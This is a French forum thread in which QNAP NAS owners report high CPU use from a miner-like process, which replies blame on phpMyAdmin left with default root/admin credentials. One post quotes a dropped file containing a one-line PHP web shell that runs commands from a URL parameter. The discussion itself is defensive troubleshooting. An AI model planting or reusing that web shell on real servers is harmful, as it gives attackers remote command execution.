Qnap 80% sur mon QNAP ?

deuillevent

Nouveau membre
2 Janvier 2019
4
0
0
Hello

J'ai besoin d'aide pour savoir quel est le program/app qui bouffe tout mon CPU.
Cela vient pas tout de suite après redémarrage mais mange jusque 90%.

Le "resource monitor" me montre que ce process s'appelle "puonai" avec l'utilisateur "httpdusr".

Si vous avez une astuce pour que je sache précisément ce que c'est, je suis preneur.
J'ai pas des masses d'appli sur mon QNAP, il ne fait pas non plus serveur web (a part pour le fonctionnement de l'interface du QNAP) dont je sais pas trop quoi faire.

Merci !

PS: je suis ingénieur système donc hésitez pas y aller fort avec les termes techniques :)

Florent
 
puonai.. c'est un malware tu as phpmyadmin installé sur ton NAS et tu as laissé root / admin en mot de passe :twisted:

regarde dans le répertoire /Web tu as plein de fichier à la c...

il suffit de les supprimer et rebooter le NAS

:cool:

adminadmin.jpg
 
Bonjour,
j'ai le même problème depuis plusieurs jour : CPU entre 60% et 100%

process = pionei / httpduser minimum 60%
répertoire Web contenait plusieurs petits fichiers et
03F21DC192A56E0F253E911AFCB9D294.php qui contient CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>
j'ai tous supprimé et bloqué le port 80

j'utilise phpmyadmin pour mes bases sql et je suis en root/admin

comment procéder pour changer le mot de passe ?
il y a le choix "réinitialiser le mot de passe" mais pas "changer le mot de passe"

quel est l'activité de ce malware ? (qui n'est pas détecté !)

JC CHAP
 
c'est le même Malware.. ce n'est pas un Malware propre à Qnap mais a une faille de phpmyadmin

le pass se change dans MySQL pour l'utilisateur root